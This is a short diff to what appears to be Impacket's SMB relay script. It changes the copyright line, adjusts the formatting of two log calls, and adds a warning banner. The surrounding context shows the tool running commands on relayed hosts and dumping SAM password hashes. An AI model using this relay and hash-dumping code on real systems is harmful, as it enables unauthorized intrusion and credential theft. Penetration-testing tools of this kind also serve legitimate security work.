@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 # Impacket - Collection of Python classes for working with network protocols.
 #
-# SECUREAUTH LABS. Copyright (C) 2020 SecureAuth Corporation. All rights reserved.
+# Copyright (C) 2023 Fortra. All rights reserved.
 #
 # This software is provided under a slightly modified version
 # of the Apache Software License. See the accompanying LICENSE file
@@ -141,7 +141,7 @@ class doAttack(Thread):
             try:
                 if self.__command is not None:
                     remoteOps._RemoteOperations__executeRemote(self.__command)
-                    logging.info("Executed specified command on host: %s", self.__SMBConnection.getRemoteHost())
+                    logging.info("Executed specified command on host: %s" % self.__SMBConnection.getRemoteHost())
                     self.__answerTMP = b''
                     self.__SMBConnection.getFile('ADMIN$', 'Temp\\__output', self.__answer)
                     logging.debug('Raw answer %r' % self.__answerTMP)
@@ -161,7 +161,7 @@ class doAttack(Thread):
                     samFileName = remoteOps.saveSAM()
                     samHashes = SAMHashes(samFileName, bootKey, isRemote = True)
                     samHashes.dump()
-                    logging.info("Done dumping SAM hashes for host: %s", self.__SMBConnection.getRemoteHost())
+                    logging.info("Done dumping SAM hashes for host: %s" % self.__SMBConnection.getRemoteHost())
             except Exception as e:
                 logging.debug('Exception:', exc_info=True)
                 ATTACKED_HOSTS.remove(self.__SMBConnection.getRemoteHost())
@@ -1110,6 +1110,7 @@ if __name__ == '__main__':
 
     RELAY_SERVERS = ( SMBRelayServer, HTTPRelayServer )
     print(version.BANNER)
+    print(version.WARNING_BANNER)
     parser = argparse.ArgumentParser(add_help=False,
                                      description="For every connection received, this module will try to SMB relay that "
                                                  " connection to the target system or the original client")
